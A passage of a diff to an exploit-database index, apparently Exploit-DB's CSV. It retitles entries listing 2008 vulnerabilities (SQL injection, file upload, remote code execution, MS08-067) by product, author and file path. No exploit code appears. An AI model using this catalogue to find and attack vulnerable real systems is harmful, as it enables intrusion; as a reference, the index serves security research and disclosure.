Vulnerabilities",2008-11-07,ahmadbady,php,webapps,0 7050,platforms/php/webapps/7050.txt,"E-topbiz Number Links 1 - 'id' SQL Injection",2008-11-07,"Hussin X",php,webapps,0 @@ -6618,12 +6619,12 @@ id,file,description,date,author,platform,type,port 7054,platforms/windows/local/7054.txt,"Anti-Keylogger Elite 3.3.0 - (AKEProtect.sys) Privilege Escalation",2008-11-07,"NT Internals",windows,local,0 7055,platforms/hardware/remote/7055.txt,"SpeedStream 5200 - Authentication Bypass Config Download",2008-11-07,hkm,hardware,remote,0 7056,platforms/windows/remote/7056.rb,"GE Proficy Real Time Information Portal - Credentials Leak Sniffer (Metasploit)",2008-11-08,"Kevin Finisterre",windows,remote,0 -7057,platforms/php/webapps/7057.pl,"MemHT Portal 4.0 - Remote Code Execution Exploit",2008-11-08,Ams,php,webapps,0 +7057,platforms/php/webapps/7057.pl,"MemHT Portal 4.0 - Remote Code Execution",2008-11-08,Ams,php,webapps,0 7058,platforms/php/webapps/7058.txt,"zeeproperty 1.0 - (File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-08,ZoRLu,php,webapps,0 7059,platforms/php/webapps/7059.txt,"Enthusiast 3.1.4 - (show_joined.php path) Remote File Inclusion",2008-11-08,BugReport.IR,php,webapps,0 7060,platforms/hardware/dos/7060.txt,"2WIRE DSL Router (xslt) - Denial of Service",2008-11-08,hkm,hardware,dos,0 7061,platforms/php/webapps/7061.txt,"V3 Chat Profiles/Dating Script 3.0.2 - (Authentication Bypass) SQL Injection",2008-11-08,d3b4g,php,webapps,0 -7062,platforms/php/webapps/7062.txt,"ZEEJOBSITE 2.0 - Remote File Upload",2008-11-08,ZoRLu,php,webapps,0 +7062,platforms/php/webapps/7062.txt,"ZeeJobsite 2.0 - Remote File Upload",2008-11-08,ZoRLu,php,webapps,0 7063,platforms/php/webapps/7063.txt,"V3 Chat Profiles/Dating Script 3.0.2 - Insecure Cookie Handling",2008-11-08,Stack,php,webapps,0 7064,platforms/php/webapps/7064.pl,"Mambo Component n-form - (form_id) Blind SQL Injection",2008-11-08,boom3rang,php,webapps,0 7065,platforms/php/webapps/7065.txt,"Cyberfolio 7.12.2 - (css.php theme) Local File Inclusion",2008-11-08,dun,php,webapps,0 @@ -6639,7 +6640,7 @@ id,file,description,date,author,platform,type,port 7076,platforms/php/webapps/7076.txt,"Collabtive 0.4.8 - (Cross-Site Scripting / Authentication Bypass / File Upload) Multiple Vulnerabilities",2008-11-10,USH,php,webapps,0 7077,platforms/php/webapps/7077.txt,"OTManager CMS 2.4 - (Tipo) Remote File Inclusion",2008-11-10,Colt7r,php,webapps,0 7078,platforms/php/webapps/7078.txt,"Joomla Component JooBlog 0.1.1 - (PostID) SQL Injection",2008-11-10,boom3rang,php,webapps,0 -7079,platforms/php/webapps/7079.txt,"FREEsimplePHPguestbook - 'guestbook.php' Remote Code Execution",2008-11-10,GoLd_M,php,webapps,0 +7079,platforms/php/webapps/7079.txt,"FREEsimplePHPGuestbook - 'Guestbook.php' Remote Code Execution",2008-11-10,GoLd_M,php,webapps,0 7080,platforms/php/webapps/7080.txt,"fresh email script 1.0 - Multiple Vulnerabilities",2008-11-10,Don,php,webapps,0 7081,platforms/php/webapps/7081.txt,"AJ ARTICLE - Remote Authentication Bypass",2008-11-10,G4N0K,php,webapps,0 7082,platforms/php/webapps/7082.txt,"PHPStore Car Dealers - Remote File Upload",2008-11-10,ZoRLu,php,webapps,0 @@ -6648,7 +6649,7 @@ id,file,description,date,author,platform,type,port 7085,platforms/php/webapps/7085.txt,"PHPStore Real Estate - Remote File Upload",2008-11-10,ZoRLu,php,webapps,0 7086,platforms/php/webapps/7086.txt,"AJSquare Free Polling Script - (DB) Multiple Vulnerabilities",2008-11-10,G4N0K,php,webapps,0 7087,platforms/php/webapps/7087.txt,"AJ Auction Authentication - Bypass",2008-11-10,G4N0K,php,webapps,0 -7088,platforms/osx/dos/7088.txt,"smcFanControl 2.1.2 (OSX) - Multiple Buffer Overflow Vulnerabilities (PoC)",2008-11-11,xwings,osx,dos,0 +7088,platforms/osx/dos/7088.txt,"smcFanControl 2.1.2 (OS X) - Multiple Buffer Overflow Vulnerabilities (PoC)",2008-11-11,xwings,osx,dos,0 7089,platforms/php/webapps/7089.txt,"Aj Classifieds - Authentication Bypass",2008-11-11,G4N0K,php,webapps,0 7090,platforms/windows/dos/7090.txt,"ooVoo 1.7.1.35 - (URL Protocol) Remote Unicode Buffer Overflow (PoC)",2008-11-11,Nine:Situations:Group,windows,dos,0 7091,platforms/linux/dos/7091.c,"Linux Kernel < 2.4.36.9 / 2.6.27.5 - Unix Sockets Local Kernel Panic Exploit",2008-11-11,"Andrea Bittau",linux,dos,0 @@ -6661,60 +6662,60 @@ id,file,description,date,author,platform,type,port 7098,platforms/php/webapps/7098.txt,"PozScripts Business Directory Script - 'cid' SQL Injection",2008-11-11,"Hussin X",php,webapps,0 7099,platforms/windows/dos/7099.pl,"Castle Rock Computing SNMPc < 7.1.1 - (Community) Remote Buffer Overflow (PoC)",2008-11-12,"Praveen Darshanam",windows,dos,0 7100,platforms/linux/dos/7100.pl,"Net-SNMP 5.1.4/5.2.4/5.4.1 Perl Module - Buffer Overflow (PoC)",2008-11-12,"Praveen Darshanam",linux,dos,0 -7101,platforms/php/webapps/7101.txt,"AlstraSoft SendIt Pro - Remote File Upload",2008-11-12,ZoRLu,php,webapps,0 -7102,platforms/php/webapps/7102.txt,"AlstraSoft Article Manager Pro - (Authentication Bypass) SQL Injection",2008-11-12,ZoRLu,php,webapps,0 -7103,platforms/php/webapps/7103.txt,"AlstraSoft Web Host Directory - (Authentication Bypass) SQL Injection",2008-11-12,ZoRLu,php,webapps,0 -7104,platforms/windows/remote/7104.c,"Microsoft Windows Server - Code Execution Exploit (MS08-067)",2008-11-12,Polymorphours,windows,remote,135 +7101,platforms/php/webapps/7101.txt,"Alstrasoft SendIt Pro - Remote File Upload",2008-11-12,ZoRLu,php,webapps,0 +7102,platforms/php/webapps/7102.txt,"Alstrasoft Article Manager Pro - (Authentication Bypass) SQL Injection",2008-11-12,ZoRLu,php,webapps,0 +7103,platforms/php/webapps/7103.txt,"Alstrasoft Web Host Directory - (Authentication Bypass) SQL Injection",2008-11-12,ZoRLu,php,webapps,0 +7104,platforms/windows/remote/7104.c,"Microsoft Windows Server - Code Execution (MS08-067)",2008-11-12,Polymorphours,windows,remote,135 7105,platforms/php/webapps/7105.txt,"Quick Poll Script - 'code.php id' SQL Injection",2008-11-12,"Hussin X",php,webapps,0 -7106,platforms/php/webapps/7106.txt,"turnkeyforms Local Classifieds - Authentication Bypass",2008-11-12,G4N0K,php,webapps,0 -7107,platforms/php/webapps/7107.txt,"turnkeyforms Web Hosting Directory - Multiple Vulnerabilities",2008-11-12,G4N0K,php,webapps,0 +7106,platforms/php/webapps/7106.txt,"TurnkeyForms Local Classifieds - Authentication Bypass",2008-11-12,G4N0K,php,webapps,0 +7107,platforms/php/webapps/7107.txt,"TurnkeyForms Web Hosting Directory - Multiple Vulnerabilities",2008-11-12,G4N0K,php,webapps,0 7109,platforms/windows/dos/7109.txt,"Pi3Web 2.0.3 - (ISAPI) Remote Denial of Service",2008-11-13,"Hamid Ebadi",windows,dos,0 7110,platforms/php/webapps/7110.txt,"ScriptsFeed (SF) Real Estate Classifieds Software - Arbitrary File Upload",2008-11-13,ZoRLu,php,webapps,0 7111,platforms/php/webapps/7111.txt,"ScriptsFeed (SF) Auto Classifieds Software - Remote File Upload",2008-11-13,ZoRLu,php,webapps,0 7112,platforms/php/webapps/7112.txt,"ScriptsFeed (SF) Recipes Listing Portal - Remote File Upload",2008-11-13,ZoRLu,php,webapps,0 7113,platforms/php/webapps/7113.txt,"BandSite CMS 1.1.4 - Insecure Cookie Handling",2008-11-13,Stack,php,webapps,0 -7114,platforms/php/webapps/7114.txt,"MemHT Portal 4.0.1 - SQL Injection Code Execution Exploit",2008-11-13,Ams,php,webapps,0 -7116,platforms/php/webapps/7116.txt,"AlstraSoft Web Host Directory 1.2 - Multiple Vulnerabilities",2008-11-14,G4N0K,php,webapps,0 +7114,platforms/php/webapps/7114.txt,"MemHT Portal 4.0.1 - SQL Injection Code Execution",2008-11-13,Ams,php,webapps,0 +7116,platforms/php/webapps/7116.txt,"Alstrasoft Web Host Directory 1.2 - Multiple Vulnerabilities",2008-11-14,G4N0K,php,webapps,0 7117,platforms/php/webapps/7117.txt,"GS Real Estate Portal US/International Module - Multiple Vulnerabilities",2008-11-14,ZoRLu,php,webapps,0 -7118,platforms/php/webapps/7118.txt,"turnkeyforms - Text Link Sales Authentication Bypass",2008-11-14,G4N0K,php,webapps,0 -7119,platforms/php/webapps/7119.php,"Discuz! 6.x/7.x - Remote Code Execution Exploit",2008-11-14,80vul,php,webapps,0 +7118,platforms/php/webapps/7118.txt,"TurnkeyForms - Text Link Sales Authentication Bypass",2008-11-14,G4N0K,php,webapps,0 +7119,platforms/php/webapps/7119.php,"Discuz! 6.x/7.x - Remote Code Execution",2008-11-14,80vul,php,webapps,0 7120,platforms/asp/webapps/7120.txt,"Bankoi Webhost Panel 1.20 - (Authentication Bypass) SQL Injection",2008-11-14,R3d-D3V!L,asp,webapps,0 -7121,platforms/php/webapps/7121.pl,"SlimCMS 1.0.0 - (edit.php) SQL Injection",2008-11-14,StAkeR,php,webapps,0 +7121,platforms/php/webapps/7121.pl,"SlimCMS 1.0.0 - 'edit.php' SQL Injection",2008-11-14,StAkeR,php,webapps,0 7122,platforms/php/webapps/7122.txt,"GS Real Estate Portal - Multiple SQL Injections",2008-11-14,InjEctOr5,php,webapps,0 7123,platforms/php/webapps/7123.txt,"X7 Chat 2.0.5 - (Authentication Bypass) SQL Injection",2008-11-14,ZoRLu,php,webapps,0 -7124,platforms/php/webapps/7124.txt,"turnkeyforms Text Link Sales - 'id' Cross-Site Scripting / SQL Injection",2008-11-14,ZoRLu,php,webapps,0 -7125,platforms/windows/remote/7125.txt,"Windows - SmbRelay3 NTLM Replay Attack Tool/Exploit (MS08-068)",2008-11-14,"Andres Tarasco",windows,remote,0 +7124,platforms/php/webapps/7124.txt,"TurnkeyForms Text Link Sales - 'id' Cross-Site Scripting / SQL Injection",2008-11-14,ZoRLu,php,webapps,0 +7125,platforms/windows/remote/7125.txt,"Microsoft Windows - SmbRelay3 NTLM Replay Attack Tool/Exploit (MS08-068)",2008-11-14,"Andres Tarasco",windows,remote,0 7126,platforms/windows/dos/7126.html,"VeryPDF PDFView - OCX ActiveX OpenPDF Heap Overflow (PoC)",2008-11-15,r0ut3r,windows,dos,0 7128,platforms/php/webapps/7128.txt,"ClipShare Pro 2006-2007 - (chid) SQL Injection",2008-11-15,snakespc,php,webapps,0 7129,platforms/multiple/local/7129.sh,"Sudo 1.6.9p18 - (Defaults setenv) Privilege Escalation",2008-11-15,kingcope,multiple,local,0 7130,platforms/php/webapps/7130.php,"Minigal b13 - 'index.php list' Remote File Disclosure Exploit",2008-11-15,"Alfons Luja",php,webapps,0 7131,platforms/php/webapps/7131.txt,"yahoo answers - 'id' SQL Injection",2008-11-16,snakespc,php,webapps,0 -7132,platforms/windows/remote/7132.py,"Microsoft Windows Server 2000/2003 - Code Execution Exploit (MS08-067)",2008-11-16,"Debasis Mohanty",windows,remote,445 +7132,platforms/windows/remote/7132.py,"Microsoft Windows Server 2000/2003 - Code Execution (MS08-067)",2008-11-16,"Debasis Mohanty",windows,remote,445 7133,platforms/php/webapps/7133.txt,"FloSites Blog - Multiple SQL Injections",2008-11-16,Vrs-hCk,php,webapps,0 7134,platforms/php/webapps/7134.txt,"PHPstore Wholesale - 'track.php?id' SQL Injection",2008-11-16,"Hussin X",php,webapps,0 7135,platforms/windows/local/7135.htm,"Opera 9.62 - file:// Local Heap Overflow",2008-11-17,"Guido Landi",windows,local,0 7136,platforms/php/webapps/7136.txt,"mxCamArchive 2.2 - Bypass Config Download",2008-11-17,ahmadbady,php,webapps,0 7137,platforms/asp/webapps/7137.txt,"OpenASP 3.0 - Blind SQL Injection",2008-11-17,StAkeR,asp,webapps,0 -7138,platforms/php/webapps/7138.txt,"E-topbiz AdManager 4 - (group) Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0 +7138,platforms/php/webapps/7138.txt,"E-topbiz ADManager 4 - (group) Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0 7140,platforms/php/webapps/7140.txt,"FREEze Greetings 1.0 - Remote Password Retrieve Exploit",2008-11-17,cOndemned,php,webapps,0 7141,platforms/asp/webapps/7141.txt,"Q-Shop 3.0 - Remote Cross-Site Scripting / SQL Injection",2008-11-17,Bl@ckbe@rD,asp,webapps,0 7142,platforms/windows/remote/7142.html,"Chilkat Socket ActiveX 2.3.1.1 - Arbitrary File Creation Exploit",2008-11-17,Zigma,windows,remote,0 7143,platforms/php/webapps/7143.txt,"PHPfan 3.3.4 - (init.php includepath) Remote File Inclusion",2008-11-17,ahmadbady,php,webapps,0 -7144,platforms/php/webapps/7144.txt,"Jadu Galaxies - (categoryID) Blind SQL Injection",2008-11-17,ZoRLu,php,webapps,0 +7144,platforms/php/webapps/7144.txt,"Jadu Galaxies - 'categoryId' Blind SQL Injection",2008-11-17,ZoRLu,php,webapps,0 7145,platforms/windows/remote/7145.txt,"Exodus 0.10 - (URI handler) Arbitrary Parameter Injection (1)",2008-11-17,Nine:Situations:Group,windows,remote,0 7146,platforms/php/webapps/7146.txt,"Simple Customer 1.2 - (Authentication Bypass) SQL Injection",2008-11-17,d3b4g,php,webapps,0 7147,platforms/php/webapps/7147.txt,"SaturnCMS - (view) Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0 7148,platforms/php/webapps/7148.txt,"Ultrastats 0.2.144/0.3.11 - (index.php serverid) SQL Injection",2008-11-17,eek,php,webapps,0 7149,platforms/php/webapps/7149.php,"VideoScript 4.0.1.50 - Admin Change Password Exploit",2008-11-17,G4N0K,php,webapps,0 7150,platforms/linux/dos/7150.html,"CUPS 1.3.7 - Cross-Site Request Forgery (add rss subscription) Remote Crash Exploit",2008-11-18,"Adrian ""pagvac"" Pastor",linux,dos,0 -7151,platforms/linux/remote/7151.c,"No-IP DUC 2.1.7 - Remote Code Execution Exploit",2008-11-18,XenoMuta,linux,remote,0 +7151,platforms/linux/remote/7151.c,"No-IP DUC 2.1.7 - Remote Code Execution",2008-11-18,XenoMuta,linux,remote,0 7152,platforms/php/webapps/7152.txt,"MusicBox 2.3.8 - (viewalbums.php artistId) SQL Injection",2008-11-18,snakespc,php,webapps,0 7153,platforms/php/webapps/7153.txt,"Pluck CMS 4.5.3 - (g_pcltar_lib_dir) Local File Inclusion",2008-11-18,DSecRG,php,webapps,0 7155,platforms/php/webapps/7155.txt,"Free Directory Script 1.1.1 - (API_HOME_DIR) Remote File Inclusion",2008-11-18,"Ghost Hacker",php,webapps,0 7156,platforms/php/webapps/7156.txt,"E-topbiz Link Back Checker 1 - Insecure Cookie Handling",2008-11-18,x0r,php,webapps,0 7157,platforms/php/webapps/7157.txt,"Alex News-Engine 1.5.1 - Arbitrary File Upload",2008-11-19,Batter,php,webapps,0 -7158,platforms/php/webapps/7158.txt,"Alex Article-Engine 1.3.0 - (fckeditor) Arbitrary File Upload",2008-11-19,Batter,php,webapps,0 -7159,platforms/php/webapps/7159.php,"PunBB (Private Messaging System 1.2.x) - Multiple Local File Inclusion Exploit",2008-11-19,StAkeR,php,webapps,0 +7158,platforms/php/webapps/7158.txt,"Alex Article-Engine 1.3.0 - 'FCKeditor' Arbitrary File Upload",2008-11-19,Batter,php,webapps,0 +7159,platforms/php/webapps/7159.php,"PunBB (Private Messaging System 1.2.x) - Multiple Local File Inclusion",2008-11-19,StAkeR,php,webapps,0 7160,platforms/php/webapps/7160.php,"MyTopix 1.3.0 - (notes send) SQL Injection",2008-11-19,cOndemned,php,webapps,0 7162,platforms/php/webapps/7162.pl,"MauryCMS 0.53.2 - Arbitrary File Upload",2008-11-19,StAkeR,php,webapps,0 7163,platforms/php/webapps/7163.txt,"RevSense - (Authentication Bypass) SQL Injection",2008-11-19,d3b4g,php,webapps,0 @@ -6722,17 +6723,17 @@ id,file,description,date,author,platform,type,port 7165,platforms/php/webapps/7165.pl,"wPortfolio 0.3 - Arbitrary File Upload Exploit",2008-11-19,Osirys,php,webapps,0 7166,platforms/php/webapps/7166.txt,"AskPert - (Authentication Bypass) SQL Injection",2008-11-19,TR-ShaRk,php,webapps,0 7167,platforms/windows/remote/7167.html,"Exodus 0.10 - (URI handler) Arbitrary Parameter Injection (2)",2008-11-20,Nine:Situations:Group,windows,remote,0 -7168,platforms/php/webapps/7168.pl,"PunBB Mod PunPortal 0.1 - Local File Inclusion Exploit",2008-11-20,StAkeR,php,webapps,0 +7168,platforms/php/webapps/7168.pl,"PunBB Mod PunPortal 0.1 - Local File Inclusion",2008-11-20,StAkeR,php,webapps,0 7170,platforms/php/webapps/7170.php,"wPortfolio 0.3 - Admin Password Changing Exploit",2008-11-20,G4N0K,php,webapps,0 -7171,platforms/multiple/local/7171.txt,"PHP 5.2.6 - (error_log) safe_mode Bypass",2008-11-20,SecurityReason,multiple,local,0 -7172,platforms/php/webapps/7172.txt,"NatterChat 1.1 - (Authentication Bypass) SQL Injection",2008-11-20,Bl@ckbe@rD,php,webapps,0 +7171,platforms/multiple/local/7171.txt,"PHP 5.2.6 - (error_log) Safe_mode Bypass",2008-11-20,SecurityReason,multiple,local,0 +7172,platforms/php/webapps/7172.txt,"Natterchat 1.1 - (Authentication Bypass) SQL Injection",2008-11-20,Bl@ckbe@rD,php,webapps,0 7173,platforms/php/webapps/7173.php,"PHP-Fusion 7.00.1 - (messages.php) SQL Injection",2008-11-20,irk4z,php,webapps,0 7174,platforms/php/webapps/7174.txt,"vBulletin 3.7.3 - Visitor Message Cross-Site Request Forgery / Worm Exploit",2008-11-20,Mx,php,webapps,0 7175,platforms/php/webapps/7175.txt,"Natterchat 1.12 - (Authentication Bypass) SQL Injection",2008-11-20,Stack,php,webapps,0 7176,platforms/php/webapps/7176.txt,"ToursManager - 'tourview.php tourid' Blind SQL Injection",2008-11-20,XaDoS,php,webapps,0 7177,platforms/linux/local/7177.c,"Oracle Database Vault - ptrace(2) Privilege Escalation",2008-11-20,"Jakub Wartak",linux,local,0 7178,platforms/windows/dos/7178.txt,"BitDefender - (module pdf.xmd) Infinite Loop Denial of Service (PoC)",2008-11-20,ProTeuS,windows,dos,0 -7179,platforms/php/webapps/7179.txt,"NatterChat 1.1 - Remote Authentication Bypass",2008-11-20,Stack,php,webapps,0 +7179,platforms/php/webapps/7179.txt,"Natterchat 1.1 - Remote Authentication Bypass",2008-11-20,Stack,php,webapps,0 7180,platforms/php/webapps/7180.txt,"VCalendar - 'VCalendar.mdb' Remote Database Disclosure",2008-11-20,Swan,php,webapps,0 7181,platforms/windows/remote/7181.html,"KVIrc 3.4.2 Shiny - (URI handler) Remote Command Execution Exploit",2008-11-21,Nine:Situations:Group,windows,remote,0 7182,platforms/php/webapps/7182.txt,"Joomla Component Thyme 1.0 - (event) SQL Injection",2008-11-21,"Ded MustD!e",php,webapps,0 @@ -6747,16 +6748,16 @@ id,file,description,date,author,platform,type,port 7195,platforms/php/webapps/7195.txt,"Prozilla Hosting Index - 'id' SQL Injection",2008-11-23,snakespc,php,webapps,0 7196,platforms/windows/remote/7196.html,"Microsoft XML Core Services DTD - Cross-Domain Scripting PoC (MS08-069)",2008-11-23,"Jerome Athias",windows,remote,0 7197,platforms/php/webapps/7197.txt,"Goople CMS 1.7 - Remote File Upload",2008-11-23,x0r,php,webapps,0 -7198,platforms/php/webapps/7198.txt,"NetArtMedia Cars Portal 2.0 - (image.php id) SQL Injection",2008-11-23,snakespc,php,webapps,0 -7199,platforms/php/webapps/7199.txt,"NetArtMedia Blog System - 'image.php id' SQL Injection",2008-11-23,snakespc,php,webapps,0 +7198,platforms/php/webapps/7198.txt,"Netartmedia Cars Portal 2.0 - (image.php id) SQL Injection",2008-11-23,snakespc,php,webapps,0 +7199,platforms/php/webapps/7199.txt,"Netartmedia Blog System - 'image.php id' SQL Injection",2008-11-23,snakespc,php,webapps,0 7200,platforms/php/webapps/7200.txt,"PG Real Estate - (Authentication Bypass) SQL Injection",2008-11-23,ZoRLu,php,webapps,0 7201,platforms/php/webapps/7201.txt,"PG Roomate Finder Solution - (Authentication Bypass) SQL Injection",2008-11-23,ZoRLu,php,webapps,0 7202,platforms/php/webapps/7202.txt,"PG Job Site - (poll_view_id) Blind SQL Injection",2008-11-23,ZoRLu,php,webapps,0 7204,platforms/php/webapps/7204.txt,"modx CMS 0.9.6.2 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-23,RoMaNcYxHaCkEr,php,webapps,0 7205,platforms/php/webapps/7205.txt,"Goople CMS 1.7 - Insecure Cookie Handling",2008-11-23,BeyazKurt,php,webapps,0 7206,platforms/php/webapps/7206.txt,"PHP Classifieds Script - Remote Database Disclosure",2008-11-23,InjEctOr5,php,webapps,0 -7207,platforms/windows/dos/7207.pl,"Nero ShowTime 5.0.15.0 - .m3u Playlist File Remote Buffer Overflow (PoC)",2008-11-24,LiquidWorm,windows,dos,0 -7208,platforms/php/webapps/7208.txt,"NetArtMedia Real Estate Portal 1.2 - (ad_id) SQL Injection",2008-11-24,"Hussin X",php,webapps,0 +7207,platforms/windows/dos/7207.pl,"Nero ShowTime 5.0.15.0 - '.m3u' Playlist File Remote Buffer Overflow (PoC)",2008-11-24,LiquidWorm,windows,dos,0 +7208,platforms/php/webapps/7208.txt,"Netartmedia Real Estate Portal 1.2 - (ad_id) SQL Injection",2008-11-24,"Hussin X",php,webapps,0 7209,platforms/windows/dos/7209.pl,"W3C Amaya 10.1 Web Browser - (URL Bar) Remote Stack Overflow (PoC)",2008-11-24,r0ut3r,windows,dos,0 7210,platforms/php/webapps/7210.txt,"Goople CMS 1.7 - Arbitrary Code Execution",2008-11-24,x0r,php,webapps,0 7211,platforms/php/webapps/7211.php,"VideoScript 3.0 <= 4.0.1.50 - Official Shell Injection",2008-11-24,G4N0K,php,webapps,0 @@ -6765,7 +6766,7 @@ id,file,description,date,author,platform,type,port 7214,platforms/php/webapps/7214.txt,"ftpzik - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities",2008-11-24,JIKO,php,webapps,0 7215,platforms/php/webapps/7215.txt,"bandwebsite 1.5 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-24,ZoRLu,php,webapps,0 7216,platforms/php/webapps/7216.txt,"WebStudio CMS - 'index.php pageid' Blind SQL Injection",2008-11-24,"Glafkos Charalambous ",php,webapps,0 -7217,platforms/php/webapps/7217.pl,"Quicksilver Forums 1.4.2 (Windows) - Remote Code Execution Exploit",2008-11-24,girex,php,webapps,0 +7217,platforms/php/webapps/7217.pl,"Quicksilver Forums 1.4.2 (Windows) - Remote Code Execution",2008-11-24,girex,php,webapps,0 7218,platforms/php/webapps/7218.txt,"nitrotech 0.0.3a - (Remote File Inclusion / SQL Injection) Multiple Vulnerabilities",2008-11-24,Osirys,php,webapps,0 7219,platforms/windows/dos/7219.pl,"Total Video Player - 'vcen.dll' Remote Off-by-One Crash Exploit",2008-11-24,Cnaph,windows,dos,0 7220,platforms/hardware/dos/7220.txt,"Siemens C450IP/C475IP - Remote Denial of Service",2008-11-24,"sky & Any",hardware,dos,0 @@ -6779,7 +6780,7 @@ id,file,description,date,author,platform,type,port 7228,platforms/php/webapps/7228.txt,"clean CMS 1.5 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-25,ZoRLu,php,webapps,0 7229,platforms/php/webapps/7229.txt,"FAQ Manager 1.2 - (config_path) Remote File Inclusion",2008-11-25,ZoRLu,php,webapps,0 7230,platforms/php/webapps/7230.pl,"Clean CMS 1.5 - (full_txt.php id) Blind SQL Injection",2008-11-25,JosS,php,webapps,0 -7231,platforms/php/webapps/7231.txt,"fuzzylime CMS 3.03 - (track.php p) Local File Inclusion",2008-11-25,"Alfons Luja",php,webapps,0 +7231,platforms/php/webapps/7231.txt,"Fuzzylime CMS 3.03 - (track.php p) Local File Inclusion",2008-11-25,"Alfons Luja",php,webapps,0 7232,platforms/php/webapps/7232.txt,"SimpleBlog 3.0 - (simpleBlog.mdb) Database Disclosure",2008-11-25,EL_MuHaMMeD,php,webapps,0 7233,platforms/php/webapps/7233.txt,"LoveCMS 1.6.2 Final (Download Manager 1.0) - File Upload Exploit",2008-11-25,cOndemned,php,webapps,0 7234,platforms/php/webapps/7234.txt,"VideoGirls BiZ - 'view_snaps.php type' Blind SQL Injection",2008-11-25,Cyber-Zone,php,webapps,0 @@ -6813,38 +6814,38 @@ id,file,description,date,author,platform,type,port 7263,platforms/php/webapps/7263.txt,"Booking Centre 2.01 - (Authentication Bypass) SQL Injection",2008-11-28,MrDoug,php,webapps,0 7264,platforms/windows/local/7264.txt,"Apache Tomcat (Windows) - runtime.getRuntime().exec() Privilege Escalation",2008-11-28,Abysssec,windows,local,0 7265,platforms/php/webapps/7265.txt,"web Calendar system 3.40 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-11-28,Bl@ckbe@rD,php,webapps,0 -7266,platforms/php/webapps/7266.pl,"All Club CMS 0.0.2 - Remote DB Config Retrieve Exploit",2008-11-28,StAkeR,php,webapps,0 +7266,platforms/php/webapps/7266.pl,"All Club CMS 0.0.2 - Remote Database Config Retrieve Exploit",2008-11-28,StAkeR,php,webapps,0 7267,platforms/php/webapps/7267.txt,"SailPlanner 0.3a - (Authentication Bypass) SQL Injection",2008-11-28,JIKO,php,webapps,0 7268,platforms/php/webapps/7268.txt,"Bluo CMS 1.2 - (index.php id) Blind SQL Injection",2008-11-28,The_5p3ctrum,php,webapps,0 7269,platforms/php/webapps/7269.pl,"CMS little 0.0.1 - (index.php term) SQL Injection",2008-11-28,"CWH Underground",php,webapps,0 7270,platforms/php/webapps/7270.txt,"ReVou Twitter Clone - (Authentication Bypass) SQL Injection",2008-11-28,R3d-D3V!L,php,webapps,0 7271,platforms/php/webapps/7271.txt,"Ocean12 FAQ Manager Pro (ID) - Blind SQL Injection",2008-11-28,Stack,php,webapps,0 7273,platforms/asp/webapps/7273.txt,"Active Force Matrix 2 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7274,platforms/asp/webapps/7274.txt,"ASPReferral 5.3 - (AccountID) Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 +7274,platforms/asp/webapps/7274.txt,"ASPReferral 5.3 - 'AccountID' Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 7275,platforms/asp/webapps/7275.txt,"ActiveVotes 2.2 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 7276,platforms/asp/webapps/7276.txt,"Active Test 2.1 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 7277,platforms/asp/webapps/7277.txt,"Active Websurvey 9.1 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 7278,platforms/asp/webapps/7278.txt,"Active Membership 2 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 7279,platforms/asp/webapps/7279.txt,"eWebquiz 8 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7280,platforms/asp/webapps/7280.txt,"Active Newsletter 4.3 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 +7280,platforms/asp/webapps/7280.txt,"Active NewsLetter 4.3 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 7281,platforms/asp/webapps/7281.txt,"Active Web Mail 4 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 7282,platforms/asp/webapps/7282.txt,"Active Trade 2 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 7283,platforms/asp/webapps/7283.txt,"Active Price Comparison 4 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 7284,platforms/php/webapps/7284.txt,"PHP TV Portal 2.0 - (index.php mid) SQL Injection",2008-11-29,Cyber-Zone,php,webapps,0 7285,platforms/php/webapps/7285.txt,"CMS Made Simple 1.4.1 - Local File Inclusion",2008-11-29,M4ck-h@cK,php,webapps,0 7286,platforms/php/webapps/7286.txt,"OraMon 2.0.1 - Remote Config File Disclosure",2008-11-29,ahmadbady,php,webapps,0 -7287,platforms/asp/webapps/7287.txt,"ActiveVotes 2.2 - (AccountID) Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 +7287,platforms/asp/webapps/7287.txt,"ActiveVotes 2.2 - 'AccountID' Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 7288,platforms/asp/webapps/7288.txt,"Active Web Mail 4 - Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 7289,platforms/php/webapps/7289.txt,"Active Price Comparison 4 - (ProductID) Blind SQL Injection",2008-11-30,R3d-D3V!L,php,webapps,0 -7290,platforms/php/webapps/7290.txt,"Active Bids 3.5 - (ItemID) Blind SQL Injection",2008-11-29,Stack,php,webapps,0 +7290,platforms/php/webapps/7290.txt,"Active Bids 3.5 - 'itemID' Blind SQL Injection",2008-11-29,Stack,php,webapps,0 7291,platforms/php/webapps/7291.pl,"OpenForum 0.66 Beta - Remote Reset Admin Password Exploit",2008-11-29,"CWH Underground",php,webapps,0 -7292,platforms/asp/webapps/7292.txt,"ASPThai.NET Forum 8.5 - Remote Database Disclosure",2008-11-29,"CWH Underground",asp,webapps,0 +7292,platforms/asp/webapps/7292.txt,"ASPThai.Net Forum 